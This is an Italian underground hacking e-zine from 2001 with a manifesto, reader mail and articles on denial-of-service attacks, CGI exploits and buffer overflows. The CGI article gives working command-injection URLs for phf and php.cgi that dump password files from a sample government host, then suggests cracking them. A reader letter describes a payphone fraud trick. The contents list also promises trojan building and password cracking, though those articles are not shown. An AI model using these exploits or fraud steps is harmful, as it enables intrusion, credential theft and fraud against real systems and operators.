Copy Link
Add to Bookmark
Report
Underground Magazine 01
{1/05/01}
,`^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^`,
{| | |\ | |¯\ |¯ |¯| |¯| |¯| |¯| | | |\ | |¯\ |\/| /¯\ |¯_ /¯\ ¯/ | |\| |¯ |¯ |¯| |¯ \ \/ /}
{|_| | \| |_/ |¯ |¯\ | | |¯\ |_| |_| | \| |_/ | | |¯| | | |¯| /_ | | | |¯ |_ |¯\ |¯ \/\/ }
{ ¯ ¯ ¯ ¯ ¯ }
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'
__ __ ___ __ ___ __ _|_ __
|__) | ` (-_ __) (-_ | ) |_, (__(
|
######################################################################
# __ __| __ __ __ __ __ __ __| #
# (__) | ) (__| (-_ | ` (__| | ` (__) (__) | ) (__| #
# __/ #
######################################################################
# __ __ __ __ __ __ o __ __ #
# | ) ) (__| (__| (__| (__ | | ) (-_ #
# __/ #
######################################################################
|''''''''''''|
___[ Numero 1 ]___
[ Anno 1-Maggio 2001 ]
[ Underground Magazine ]
[ Festa dei lavoratori ;)]
························
ERA ORA! 5 mesi sono passati dall'uscita del primo numero (vi avevo avvertito ke l'uscita era
"aperiodika" ;o)), vi assicuro ke questo numero è di qualità nettamente superiore al precedente,
questa volta abbiamo seguito il detto "poki ma buoni" ;o)
Poko prima dell'uscita di questo numero si sono uniti alla nostra crew 3 nuovi elementi:
FeltonSpray (i cui artikoli vengono ospitati anke da hackerzine e tankcommandos);
Jrash (che scrive anke per DirtyNet, sono artikoli diversi, naturalmente :))
e SpaceIce.
Nel sekondo numero sono state aggiunte le sezioni IRC, VIRII e OTHER (kontenente traduzioni e
materiale vario), inoltre troviamo la
prima parte di una "guida ad Unix" skritta da Rhost, un korso di C ed un artikolo su Delphi
(non esiste solo il C! :Þ), continua la guida al buon vekkio Pascal...
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××MANIFESTO××××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
Siamo hackers, newbies, phreakers, smanettoni, anarchici e rivoluzionari di un sistema che ci
va ormai stretto. Siamo "gente comune", molto diversa fra noi, ma siamo un gruppo, un gruppo
unito da un desiderio comune: rivoluzionare il Sistema; oguno a suo modo (l'hacker e il cracker
grazie alle loro conoscenze informatiche, il phreaker grazie alle sue capacità tecniche, ...),
ma tutti uniti per un mondo diverso, migliore, che rispetti le idee e la libertà di tutti. Vi
sembrerà un'utopia, la fantasia di una mente malata (ah, grazie :o), ma qualcuno dovrà pur
cominciare... ;o)
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××DisclaimerD×××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
______________________
/ . . (<$$$$$>Disclaimer<:::::>)
. . . _/~~~~~~~~~~~~~~~~~~~~~~~~~~\_ . . . \
.( . . /~ ~\ . . .
( . . .~ ~. . )
()\/_____ _____\/() . . ).
( .-'' ~~~~~~~~~~~~~~~~~~~~~~~~~~~ ``-. ...
. . . .-~ __________________ ~-. . /
. ..`~~/~~~~~~~~~~~~TTTTTTTTTTTTTTTTTTTT~~~~~~~~~~~~\~~' . ) .
. .| | | #### #### || | | | [] | | | || #### #### | | | .
( ;__\|___________|++++++++++++++++++|___________|/__;. .
. (~~====___________________________________====~~~)
( . .. \------____________[-PULA-]______________------/ .. . )
. | || ~~~~~~~~ || |
\_____/ \_____/
Disclaimer:
L'UNDERGROUND MAGAZINE CREW NON SI ASSUME ALCUNA RESPONSABILITA' PER IL "MAL" UTILIZZO DI
QUESTA E-ZINE ED IMPONE A COLUI CHE VUOLE CONTINUARE QUESTA LETTURA I SEGUENTI TERMINI:
"NON INCOLPERO' ALCUN MEMBRO DELL'UMC, NESSUNO ATTRAVERSO IL QUALE HO RICEVUTO QUESTA RIVISTA,
NESSUNO CHE HA COLLABORATO IN QUALSIASI MODO ALLA CREAZIONE DI QUEST'E-ZINE; ACCETTO IL FATTO
CHE QUESTO TESTO E' NATO PER IL SINGOLO SCOPO DI INFORMARE IL LETTORE E NON VUOLE IN ALCUN MODO
INDURLO A COMPIERE AZIONI ILLEGALI; COMPRENDO INOLTRE CHE INFORMARE NON E' ILLEGALE.
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
,·······,________________________________________________________________
|ANNUNCI| 1)Chiunque voglia scrivere per Underground Magazine e si sente`'.
`·······` all'altezza ;] di far parte dell'UM Crew mi scriva a questo |
indirizzo: |
cookbooker@libero.it con il subject "UMc richiesta vollaborazione". |
2)Chi non ha tempo, non se la sente o semplicemente si vergogna :) di |
scrivere per noi ma vuole collaborare mi scriva (cookbooker@libero.it) |
segnalandoci errori (subject: UM errori), news (subject: UM news) o |
qualsiasi altra cosa. |
Le sue e-mail, se verranno ritenute interessanti, verranno pubblicate |
nel prossimo numero. `
'-------------------------------------------------------------------------'
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××× allegati ××××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
»MailFucker contiene i sorgenti e l'eseguibile di un anonymailer fatto in delphi, riguardante
l'artikolo "Anonymailer in Delphi";
»Bat2Com serve a convertire file .bat in .com; riguardante l'artikolo di Jrash sui trojan;
»Unix.doc contiene la prima parte della guida originale ad Unix di Rhost;
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××××× errori ×××××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
Potevano mankare degli errori? a quanto pare no.. eheh
1) Nel precedente numero ho dato una definizione konfusa di proxy (una specie di incrocio fra
proxy e socks), mi giustifiko dicendo ke era molto tardi ed ero mezzo rinkoglionito... mi appello
alla clemenza della corte... :) e vi do una definizione più giusta: (ma sarà veramente giusta?:))
I proxy servono a garantire una certa anonimità nella visita di siti facendo da "ponte" tra il
sito e voi... insomma da un analisi superficiale risulterà ke non avete visitato quel sito, i
proxy, normalmente, usano la porta 80.
2) (N.d.R. La seguente nota è tratta da un'e-mail inviatami da SpaceIce)
-Guida a Linux Red Hat di BUDDAMONK-
Come tu hai affermato all'inizio tali appunti liberi sono di un altra persona:
Appunti di informatica libera 2000.07.31
--- Copyright (c) 2000 Daniele Giacomini -- daniele@swlibero.org ---
Bene...ci sono errori macroscopici...ma forse macro è dire poco...mastodontici...tale Daniele
Giacomini spero non abbia usato sta roba in esami :) ....in tutti gli appunti la Redhat siglata
come GNU/Linux....ma siamo pazzi!!!! ....la Redhat NON è mai stata della GNU...è nata il Dicembre
1994...ed era commerciale allora...esattamente come lo è oggi....non a caso esistono versioni
diversificate della Redhat,quella free...ke non lo è...dovrei dire evaluation....ossia di
prova...ke cmq è a tutti gli effetti funzionale al 100% anke questa per un uso privato
per imparare...è composta da molti meno tools di quelle a pagamento...te lo dice
il fatto ke proprio questa occupa al massimo 2 cd,mentre la deluxe edition 7 cd, e la
professional server 11 cd....non penso ke siano vuoti tutti questi cd :)
L'unica distro GNU..è come sai la debian...e non ce ne sono altre.
Anzi la stessa GNU sta spostando il suo progetto verso Hurd ke non è + Linux, ma un ambiente
unix a parte...anke se la debian/linux viene ancora sviluppata in parallelo alla debian/hurd.
Altra affermazione errata "Ci sono distribuzioni che "derivano" dalla Red Hat in quanto
utilizzano il formato RPM, Red Hat Package Manager"....ormai l'archivio RPM è passato come
standard tra le distro...e non vuoldire ke se una distro le usa allora è derivata dalla
Redhat...diciamo ke ci sono buone possibilità ke ne derivi ma non è certo...sicuramente
ci si voleva rifare al caso Linux Mandrake, ke in origine era una Redhat con svariati
tool e autoconfigurazioni varie...dalla ver 7 la Mandrake NON è + una Redhat a tutti
gli è effetti ma una distro a parte.
A fine appunti "GNU/Linux Mandrake" ...stesso discorso iniziale la Mandrake non è GNU.
3) Nel numero precedente ho dato i links sbagliati di tuttoscript e mondoscript, i links
esatti sono i seguenti:
www.tuttoscript.net
www.mondoscript.net
Ühm... gli errori DOVREBBERO essere finiti, almeno spero... ;)
Se volete segnalarcene degli altri scrivetemi a cookbooker@libero.it e usate kome oggetto
"UM errori". Al prossimo errore! ;o)
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××××× LinkZ ××××××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
××»Nome«××××××××××××»Indirizzo«×××××××××××××××»Genere«××××××
×UMCrew----------->www.umcrew.con------------>e-zine<------×
×HackerZine------->www.hackerzine.org-------->e-zines<-----×
×Spippolatori----->www.spippolatori.com------>e-zine<------×
×2600------------->www.2600.con-------------->e-zine<------×
×TuttoScript------>www.tuttoscript.net------->IRC<---------×
×MondoScript------>www.mondoscript.net------->IRC-Script<--×
×PuntoInformatico->www.punto-informatico.it-->NewZ<--------×
×HackerNews------->www.hackernews.com-------->NewZ<--------×
×NubeHack--------->www.nubehack.com---------->Hacking<-----×
×TLSecurity------->www.tlsecurity.net-------->INsecurity<--×
×Bismark---------->www.bismark.it------------>Underground<-×
×AstaLaVista------>http://astalavista.box.sk->CrackZ<------×
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
××»Membro«××××××××××»Indirizzo«×××××××××××××××××××××××××××××
×Cookbooker------->www.cookbooker.com<---------------------×
×----------------->tuxhack.cjb.net<------------------------×
×Ulisses1--------->ulisses1.tsx.org<-----------------------×
×FeltonSpray------>spazioweb.inwind.it/felton<-------------×
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××××× ..... ××××××××××××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××× |Posta| ×××××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××××× ····· ××××××××××××××××××××××××××××××××××××××××××××××××××
1)da: "Lorenzo" (N.d.R. non quello del Grande Fratello... ;))
× Ciao a tutti...
× Prima di tutto complimenti x la rivista,è l'a seconda cosa ke leggo dopo i
× giornali automobilistici...
× Volevo dirvi un trukketto x le cabine telefonike,nel caso vi interessi:
× avete bisogno di 2 skede telefonike,1 vuota e 1 con almeno l'importo minimo
× x una kiamata e uno spillino da cucito.Inserite la skeda con l'importo
× minimo nella cabina telefonica e componete il numero...quando scade xke
× avete finito i soldi inserite la skeda vuota con lo spillino ancorato nel
× pezzo finale della skeda,il lettore continuera a "kiamare" la skeda,ma essa
× bloccata non entrera mai e quindi potrete restare al telefono fino a quanto
× vorrete.
× Ricordatevi,molto importante,ke la skeda iniziale ke avete iserito,non va
× tolta dalla fessura + bassa del lettore,se la toglierete la comunicazione si
× interromperà.
×
× ...
×
× P.S.---->continuate con la vostra rivista xke è interessante
Cerkeremo di accontentarti... ;o)
2)da: "Lupin" (cioè... non è ke un cartone animato giapponese degli anni 70 ci abbia mandato 'na
mail... è solo il suo nick... :P)
× sinceramente trovo la vostra zine molto al di sotto di quelle che oggi l underground italiano
× offre ;D niente da dire pero ;D siete stati grandi per l iniziativa ma per me dovreste
× concentrarvi un po di piu sui contenuti ;D di fatto titoli come
×
× |^'<>################################################################<>'^|
× |>>Come farsi una shell------<<<<'^^'<<<<<<<<<<BUDDAMONK>>>>>>>>>>>>>>>>>|
× |>>Installare Linux Slackware<<<<'^^'<<<<<<<<<<BUDDAMONK>>>>>>>>>>>>>>>>>|
× |>>Un primo passo verso Unix-<<<<'^^'<<<<<<<<<<BUDDAMONK>>>>>>>>>>>>>>>>>|
× |>>Appunti/guida alla RED HAT<<<<'^^'<<<<<<<<<<BUDDAMONK>>>>>>>>>>>>>>>>>|
×
× si sono già visti anke su giornali tipo linux & C per cui una zine elettronica dovrebbe
× offrire cose che nn si trovano tanto facilmente (vedi che ne so il progetto ninja o onosendai
× di fusys ;) per cui niente da dire sulla zine ma sui contenuti si ;D nn che siano da buttare
× anzi se vedete bfi1 e bfi 4 o 5 i contenuti sono migliorati totalmente quindi vi faccio gli
× auguri ;D di poter migliorare .
× NN ne faccio una accusa ma è solo un commento questa mail
×
× ciao a tutti LUPIN
Beh... e kosì sono arrivati anke i tanto odiati kommenti... >:\
cmq... l'autore degli artikoli ke hai kommentanto si è preso una vakanza a lungo termine... ehhe
spero ke almeno questo numero ti abbia soddisfatto. :o)
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»«««««««««««««««««««««««««««««««««««««««««««««
«»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»[SOMMARIO]«««««««««««««««««««««««««««««««««««««««««»
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»«««««««««««««««««««««««««««««««««««««««««««««
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××××××××××[INTRO]××××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
»»»»»»»»»»»»[TITOLO]««««««««««««««««««««««««»»»»»»»»»»»»»»»»»»»»»»»»[AUTORE]«««««««««««««««««
×»Introduzione««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker«««««««««««««««««««««««««««
×»Manifesto«««««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker«««««««««««««««««««««««««««
×»Disclaimer««««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker«««««««««««««««««««««««««««
×»Annunci«««««««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker«««««««««««««««««««««««««««
×»Allegati««««««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker«««««««««««««««««««««««««««
×»Errori««««««««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker«««««««««««««««««««««««««««
×»LinkZ«««««««««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker«««««««««««««««««««««««««««
×»Posta«««««««««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker-lettori«««««««««««««««««««
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××××××××[HACKING]×××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
×»Denial Of Service (parte 2)«««««««««««««««»»»»»»»»»»»»Cookbooker«««««««««««««««««««««««««««
×»CGI Exploit«««««««««««««««««««««««««««««««»»»»»»»»»»»»FeltonSpray««««««««««««««««««««««««««
×»Buffer overflows««««««««««««««««««««««««««»»»»»»»»»»»»Cujo«««««««««««««««««««««««««««««««««
×»WU-FTP 2.4(1) EXPLOIT«««««««««««««««««««««»»»»»»»»»»»»Jrash««««««««««««««««««««««««««««««««
×»Fottere le password in Linux««««««««««««««»»»»»»»»»»»»FeltonSpray««««««««««««««««««««««««««
×»TUTTO SU "NMAP"«««««««««««««««««««««««««««»»»»»»»»»»»»Jrash««««««««««««««««««««««««««««««««
×»IIS Bugs««««««««««««««««««««««««««««««««««»»»»»»»»»»»»Ulisses1«««««««««««««««««««««««««««««
×»IP Spoofing«««««««««««««««««««««««««««««««»»»»»»»»»»»»Cujo«««««««««««««««««««««««««««««««««
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××××××[PROGRAMMING]×××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
×»Pascal, lesson 2««««««««««««««««««««««««««»»»»»»»»»»»»EvilAngel««««««««««««««««««««««««««««
×»Guida al C««««««««««««««««««««««««««««««««»»»»»»»»»»»»FeltonSpray««««««««««««««««««««««««««
×»AnonyMailer in Delphi«««««««««««««««««««««»»»»»»»»»»»»Cookbooker«««««««««««««««««««««««««««
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××××××××[PHREAKING]××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
×»Fottiamo il 112«««««««««««««««««««««««««««»»»»»»»»»»»»FeltonSpray««««««««««««««««««««««««««
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××××××[Linux & Unix]××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
×»LOADABLE KERNEL MODULE««««««««««««««««««««»»»»»»»»»»»»Ulisses1«««««««««««««««««««««««««««««
×»Shell«««««««««««««««««««««««««««««««««««««»»»»»»»»»»»»FeltonSpray««««««««««««««««««««««««««
×»Ricompilazione del Kernel«««««««««««««««««»»»»»»»»»»»»FeltonSpray««««««««««««««««««««««««««
×»Guida ad Unix«««««««««««««««««««««««««««««»»»»»»»»»»»»Rhost««««««««««««««««««««««««««««««««
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××××××××××[NARCOZ]×××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
×»NARCOS(o qualcosa del genere)«««««««««««««»»»»»»»»»»»»Freesto««««««««««««««««««««««««««««««
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××××××××××[WRITING]××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
×»WrItInG«««««««««««««««««««««««««««««««««««»»»»»»»»»»»»Freesto««««««««««««««««««««««««««««««
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
××××××××××××××××××××××××××××××××××××××××××××××[IRC]××××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
×»Kome installare un bot««««««««««««««««««««»»»»»»»»»»»»Cookbooker«««««««««««««««««««««««««««
×»TakeOver!«««««««««««««««««««««««««««««««««»»»»»»»»»»»»FeltonSpray««««««««««««««««««««««««««
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××××××××××[VIRII]×××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
×»Cataloghiamo i virus informatici««««««««««»»»»»»»»»»»»Jrash««««««««««««««««««««««««««««««««
×»Guida alla creazione di trojan««««««««««««»»»»»»»»»»»»Jrash««««««««««««««««««««««««««««««««
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××××××××××[OTHER]×××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
×»NewZ««««««««««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker«««««««««««««««««««««««««««
×»Come Fregare le macchinette dei POKER...««»»»»»»»»»»»»FeltonSpray««««««««««««««««««««««««««
×»Backdoor nel modem ADSL Alcatel?««««««««««»»»»»»»»»»»»Cujo«««««««««««««««««««««««««««««««««
×»Creare cd protetti««««««««««««««««««««««««»»»»»»»»»»»»SpaceIce«««««««««««««««««««««««««««««
×»Conclusione«««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker«««««««««««««««««««««««««««
«»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»««««««««««««««««««««««««««««««««««««««««««««»
___________________________________________________________
| _ _ ___ _____ _ _ _ __ _ _____ |
| | | | | / | / ___| | | / / | | | \ | | / ___| |
| | |_| | / /| | | | | |/ / | | | \| | | | |
| | _ | / / | | | | | |\ \ | | | |\ | | | _ |
| | | | | / / | | | |___ | | \ \ | | | | \ | | |_| | |
| |_| |_| /_/ |_| \_____| |_| \_\ |_| |_| \_| \_____/ |
-----------------------------------------------------------
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
_
__| ___ __ o __ | __ _|_ __ ___ __ o __ ___
(__| (__/_ | ) | (__( |_, (__) | __) (__/_ | ' (__| | (___ (__/_
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: Denial Of Service (parte 2)]
[Autore: Cookbooker]
[Tempo utilizzato: troppo :P]
[Saluti: saluto tutta la Crew del chan #olimpo :* ]
Nell'ultimo numero abbiamo spiegato il funzionamento di uno smurf attack e abbiamo fatto una
veloce panoramika degli altri attakki di tipo "Denial Of Service" (attakki ke negano un servizio).
Ora voglio approfondire l'argomento, spiegando il funzionamento degli altri attakki DoS più
utilizzati.
[ TEARDROP ]
L'attakko: i pakketti IP hanno una lunghezza massima di 64 Kb ma, dato ke la maggior parte delle
skede di rete non è in grado di gestire pakketti kosì grandi, vengono frammentati in pakketti di
minor grandezza ke verranno poi rikomposti una volta giunti a destinazione. A questo punto vi
potreste kiedere "kosa succederebbe se le informazioni kontenute nel pakketto IP destinate al
riassemblamento del pakketto fossero sabotate e inkomporensibili?" il sistema della vittima
andrebbe in crash nel tentativo di rikomporre i pakketti (o al limite la konnessione della
vittima verrebbe notevolmente rallentata)! :)
La difesa: per difenderci dalla "versione standard" di questo attakko ci basta aggiornare il
nostro sistema kon le WinSock2.2.
Sistemi operativi affetti: Windows 3.1/95/NT.
[ IP SPOOFING ]
L'attakko: Il camuffamento del proprio indirizzo IP (IP Spoofing) può essere utilizzato per
inviare alla vittima un messaggio SYN contenente un indirizzo IP inesistente, la vittima cerka
di rispondere inviando un messaggio SYN-ACK dopodikè rimane in attesa del messaggio ACK ke non
arriverà mai dato ke l'IP a kui ha rikiesto l'ACK è inesistente. Ripetendo velocemente questo
procedimento (prima ke l'host si akkorga ke sta "parlando al muro" ;) impediremo alla vittima di
soddisfare le altre rikieste di servizio.
La difesa: non è possibile uscire del tutto indenni da questo attakko, tuttavia è possibile
limitare i danni akkorciando il tempo massimo di una rikiesta di konnessione.
Sistemi operativi affetti: tutti.
(N.d.R. guarda l'artikolo di Cujo per ulteriori approfondimenti :)
[ PING OF DEATH ]
L'attakko: la maggior parte dei sistemi operativi (da Windows a buona parte dei sistemi UNIX)
non rieskono a gestire un pakketto ICMP di tipo echo di dimensioni superiori ai 64 Kb. Se noi ne
inviamo uno dalle dimensioni eccessive, il sistema va in crash.
La difesa: è possibile configurare il proprio firewall in modo da ignorare le rikieste ICMP o
semplicemente è possibile aggiornare il proprio sistema operativo.
Sistemi operativi affetti: Windows 95/NT.
[ LAND ]
L'attakko: inviando un pakketto SYN contenente porta o IP Address sbagliati kauseremo un blokko
del sistema della vittima.
La difesa: è necessario un aggiornamento del sistema operativo.
Sistemi operativi affetti: Windows 3.1/95/NT.
[ PING PATTERN ]
L'attakko: inviando alla vittima il komando ATH0+++ il modem si diskonnette.
La difesa: Start\Impostazioni\Pannello di controllo\Modem\Proprietà modem\Connessione\Avanzate\Altre impostazioni\ modificate il valore S2 in S2=255;
se questo è troppo komplikato (spero di no... :P) kambiate modem! :oÞ
Modem affetti: fino a qualke tempo fa ne erano affetti tutti tranne gli U.S.Robotics (il mio :o))
ora non so.. kredo ke questo bug sia stato korretto nei modem più recenti.
[ BLOOP ]
L'attakko: invia in modo casuale pakketti ICMP mandando in crash il sistema. Questo attakko può
essere effettuato solo da sistemi Unix.
La difesa: prokuratevi un buon firewall :P
Sistemi operativi affetti: WinZozZo 95/98 NT.
[ OOB ]
L'attakko: ki non rikorda il buon vekkio WinNuke? :°) questa utility è stata, probabilmente,
la prima a generare un attakko di tipo DoS. Il WinNuke inviava dati Out Of Band (OOB) sulla porta
utilizzata da NetBios (grazie Bill!;) kausando la ben nota skermata blu o, a volte, il blokko del
sistema.
La difesa: ormai questo attakko viene utilizzato sporadicamente... diciamo ke l'ho messo per
nostalgia... hehe... cmq per difendersi da questo attakko basta aggiornare l'O.S. kon WinSock2.2
o applicare una semplice patch rilasciata da Micro$oft.
Sistemi operativi affetti: Window$ 3.1, 95 ed NT.
[ IGMP FLOOD ]
L'attakko: questo attakko konsiste in un flood di pakketti IGMP ke provocano un rallentamento nel
sistema della vittima fino al crash completo. La buona riuscita di questo attakko è favorita
da una veloce konnessione dell'attakkante.
Sistemi operativi affetti: TUTTE le versioni di Windoze :o)
ßyeZ. Cookbooker.
···············································································
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
__ __ o ___ \_' __ | __ o _|_
(___ (__| | (__/_ / \ |__) |_, (__) | |_,
__/ |
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: CGI Exploit]
[Autore: FeltonSpray]
Disclaimer
Raga io non mi assumo nessuna responsabilità per le cazzate che fate, questo
testo è stato solo scritto per informarvi e per provare questa tecnica sul
vostro sistema!
Adesso Facciamo un'intro su che cosa sono le CGI! Le CGI non sono altro
che dei semplici script usati dagli utenti su di un server. Questi script
a volte girano sotto permessi r00t e si possono usare degli exploit per
far eseguire al programma certi comandi arbitrii che di sicuro l'ADM non
vorrebbe. hihhiihi
Credo che più o meno conosciate tutti il PHF visto che all'inizio tutti abbiamo
letto la mitica guida di Lord_Shinva beh cmq ve la riporto lo stesso ve la spiego
e vi dico una tecnica che non so se conoscono tutti, io l'ho imparate diverso
tempo fà e vi garantisco che nei server in cui gira da root funziona e come!
http://www.vittima.gov/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Questo è un'esempio di phf che se lo trovate nel sistema con permessi r00t nel
vostro bel browser troverete chissà come mai il file DELLE PASS =)
http://www.vittima.gov >--> la nostra vittima (mmm non credo che dobbiate usare .gov ;p)
cgi-bin/phf >--> Richiamiamo la cartella cgi-bin e gli diciamo di prendere il phf!
? >--> serve a far capire che stiamo eseguendo comandi sul phf
Qalias=x%0a/bin/cat%20/ >--> Usatelo solo per prendere file di pass anche se potete richiamare
qualsiasi comando (VEDETE CHE LO STESSO VENITE LOGGATI!)
/etc/passwd >--> Il percorso di passwd (potete anche mettere /etc/shadow)
Se tutto funziona avete nel video del browser il file con le pass, copiatele in un txt e
datelo in pasto ai pescecani! ehm scusate in pasto a John The Ripper =)
Adesso che vi ho spiegato il phf vi spiego l'exploit che volevo dirvi, non l'ho scoperto io
quindi do i crediti a chi l'ha scoperto ma non so il nome quindi... (Volevo solo informarmi
così non mi dite che sono un lamer del cazzo che rippa!)
Prima di tutto vi insegno il comando per vedere quali CGI sono presenti in /cgi-bin/
http://www.vittima.gov/cgi-bin/test-cgi?*
EKKO IL COMANDO:
http://www.vittima.gov/cgi-bin/php.cgi?/etc/passwd
Beh io lo giudico molto più pratico del phf, fa la stessa cosa ed in più il phf è conosciuto da tutti
gli admin ed esistono software specifci per far vedere se il server sta subendo un'attakko PHF.
Anche queste volta siamo alla conslusione del TXT :-( spero che i newbies con questa lettura abbiano
capito come utlizzare questo exploit, come vedere in un server che CGI sono presenti, etcc
A presto raga ciao ciaooooooooooo
[]---[FeLtOnSpRaY]---[]
[]---[ feltonspray@katamail.com ]---[]
···············································································
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
_ _ _
|__ _|_ _|_ ___ __ __ ___ __ _|_ | __ __
|__) (__(_ | | (__/_ | ' (__) (__| (__/_ | ' | |_, (__) (__(__( __)
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: Shell & Stack or Buffer overflow]
[Autore: Cujo]
Come sfruttare i bachi di programmazione.
Immagino che molti di voi sappiano cos'è un overflow,soprattutto se messo in relazione col buffer.
Gli exploit basati sugli overflows,infatti,sfruttano le limitate dimensioni in kb di un buffer
o,x quanto riguarda lo shell overflow,la capacità di gestire una serie di caratteri molto lunga.
/* Ms I.E. Folder Shell Extension Buffer Overflow */
Nome alquanto lungo ( non x altro siamo in tema... :) ) x descrivere un bug ancora presente in
I.E. 5. Il programma,infatti, non è capace di gestire directory con nomi molto lunghi.Un modo
x sfruttare uqesto bug è quello di fare un link ad una directory dal nome molto grande Es:<a>
href="ftp://ftp.microsoft.com/longstring" </a> oppure aprendo directory anch'esse di diversi
caratteri,fino a quando il buffer va in overflow.
